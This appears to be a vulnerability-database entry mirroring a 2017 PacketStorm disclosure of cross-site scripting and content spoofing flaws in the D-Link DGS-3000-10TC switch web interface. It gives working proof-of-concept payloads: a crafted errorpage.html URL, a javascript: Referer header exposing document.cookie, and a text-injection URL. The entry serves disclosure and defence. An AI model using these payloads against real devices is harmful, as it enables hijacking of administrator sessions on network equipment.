ID

VAR-E-201709-0469


TITLE

D-Link DGS-3000-10TC Cross Site Scripting / Content Spoofing

Trust: 0.5

sources: PACKETSTORM: 144243

DESCRIPTION

D-Link DGS-3000-10TC suffers from cross site scripting and content spoofing vulnerabilities.

Trust: 0.5

sources: PACKETSTORM: 144243

AFFECTED PRODUCTS

vendor:d linkmodel:dgs-3000-10tcscope: - version: -

Trust: 0.5

sources: PACKETSTORM: 144243

EXPLOIT

Hello list!

There are Cross-Site Scripting and Content Spoofing vulnerabilities in
D-Link DGS-3000-10TC.

-------------------------
Affected products:
-------------------------

Vulnerable is the next model: D-Link DGS-3000-10TC, Firmware Version
2.00.006. All other versions also must be vulnerable.

----------
Details:
----------

Cross-Site Scripting (WASC-08):

http://site/html/errorpage.html?%22;alert(document.cookie);//

Cross-Site Scripting (WASC-08):

http://site/html/errorpage.html

Attack via header "Referer: javascript:alert(document.cookie)".

Content Spoofing (WASC-12):

http://site/html/errorpage.html?You%20are%20hacked

Text Injection attack is possible.

------------
Timeline:
------------

2014-2017 - informed developers about multiple vulnerabilities in this and
other D-Link devices.
2017.07.28 - announced at my site about these vulnerabilities.
2017.08.28 - informed about them one USA company with bug bounty program -
they were interested in this device, but not in these vulnerabilities. Later
informed D-Link about them.
2017.09.16 - disclosed at my site (http://websecurity.com.ua/8698/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Trust: 0.5

sources: PACKETSTORM: 144243

EXPLOIT HASH

LOCAL

SOURCE

md5: 3f6dd9f19a9efc47f919300380d1a65a
sha-1: 7ffebade804473cb8284304ca2762f957ddc9cff
sha-256: 44e7a7ddaed08c5343bb3c5852a8c95a6b0749de85f90b518d5d021ae0e107c3
md5: 3f6dd9f19a9efc47f919300380d1a65a

Trust: 0.5

sources: PACKETSTORM: 144243

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 144243

TYPE

spoof, xss

Trust: 0.5

sources: PACKETSTORM: 144243

TAGS

tag:exploit

Trust: 0.5

tag:spoof

Trust: 0.5

tag:vulnerability

Trust: 0.5

tag:xss

Trust: 0.5

sources: PACKETSTORM: 144243

CREDITS

MustLive

Trust: 0.5

sources: PACKETSTORM: 144243

EXTERNAL IDS

db:PACKETSTORMid:144243

Trust: 0.5

sources: PACKETSTORM: 144243

SOURCES

db:PACKETSTORMid:144243

LAST UPDATE DATE

2022-07-27T09:51:39.237000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:144243date:2017-09-19T00:33:33